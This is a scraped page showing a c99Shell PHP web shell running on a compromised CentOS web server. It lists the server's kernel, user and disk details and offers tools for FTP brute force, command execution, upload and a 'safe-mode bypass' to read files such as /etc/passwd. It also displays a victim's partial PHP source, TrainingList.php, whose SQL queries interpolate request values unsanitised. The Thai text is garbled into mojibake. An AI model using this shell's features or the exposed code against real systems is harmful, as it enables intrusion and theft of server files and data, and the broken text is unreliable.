110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Dev/ drwxr-xr-x Free 52.61 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/Dev/ drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.16%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: TrainingList.php (16.43 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../include/Function.php" );
		require_once( "../includes/cURL.php" );
	
		/**  Create Database Object  */
		$dbObj = new DBConn;

		//=== SESSION
		$Username = $valid_user; 
		
		
		/**  Config Table for This Page  */
		$myTable1 = "personal_tb";
		$myTable2 = "training_tb";
		
		$myTable2PK = "Date_start";
		$WHERE1 = "Teacher_code='$Teacher_code'";
		
		/**  Table  -->  personal_tb  */
		/*
		$query1 = " SELECT *  FROM $myTable1  WHERE Username='$Username' ";
		$result1 = $dbObj->execQuery($query1);
		$rss = $dbObj->fetchArray($result1);
			$Teacher_code = $rss['Teacher_code'];
		*/
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
		
		/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 10; }
		
	} # else
 ?>






ўйНБЩЕ·СиЗд»єШ¤ЕТЎГ - ўйНБЩЕЎТГѕСІ№ТєШ¤ЕТЎГ





  
    
    
    execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM $myTable2  WHERE Teacher_code='$Teacher_code'  ORDER BY $OrderBy $ASCDESC ";
		} 
		elseif( !isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM $myTable2  WHERE Teacher_code='$Teacher_code'  ORDER BY $myTable2PK DESC ";
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);

		$sql33 = "select * from dev_hrperson where Teacher_code = '$Teacher_code'";
		$result33 = $dbObj->execQuery($sql33);
		$rs33 = $dbObj->fetchArray($result33);
    ?>
    
     
      
      
        
      
      
        Л№йТЛЕСЎ  » ЁСґЎТГўйНБЩЕЎТГѕСІ№ТєШ¤ЕТЎГЁУб№ЎГТВєШ¤¤Е·ХиБХНВЩибЕйЗ
        ЁУ№З№ўйНБЩЕµиНЛ№йТ
          
      
      
        
          
            
            
          
          
            ·Сй§ЛБґ:  ГТВЎТГ
             
          
          
             ‹ ВйН№ЎЕСє
             
          
          
      
      
        
      	 0 ) { ?>
        fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
				$query = " SELECT *  FROM  dev_his   WHERE  Training_code ='$rs[Training_code]'  and  Teacher_code='$rs[Teacher_code]'  ";
				$result9 = $dbObj->execQuery($query);
				$rss = $dbObj->fetchArray($result9);
				$Training_code = $rss['Training_code'];
          ?>
          freeresult($result);
          ?>
          
          
            No.
			аГЧиН§
			ГРЛЗиТ§ЗС№·Хи
			
            ЁСґЎТГ
          
          
            
            &Teacher_code=&HisId=','TrainingDetail','750','650','yes')">&Teacher_code=&HisId=','TrainingDetail','750','650','yes')">
             - 
            
            
                        
			
												
			
							
            
						
							
						
						
            
            
				";
						else echo "";
					}
					else echo "";
		
				?>
			
            
          
			
				 
				 
            
        
        
        
          
             0 ) { ?>
              
                
                  
                
                
                  Л№йТ:
                     1) {	
                            $previous = $display - 1;					
                    ?>
                    
bool(false)


:: Command execute ::
Enter:   Select:  



:: Shadow's tricks :D  ::

  
    Useful Commands 
    
    
      
        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  
   Kernel Info: 
      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  
    Php Safe-Mode Bypass (Read Files)
    


    
      
      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  
   Php Safe-Mode Bypass (List Directories):     
      

      Dir:  

 eg: /etc/


    
    




 :: Search ::  - regexp 
 :: Upload :: 
[ ok ]



:: Make Dir :: 
[ ok ] :: Make File :: 
[ ok ]

:: Go Dir ::  :: Go File :: 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--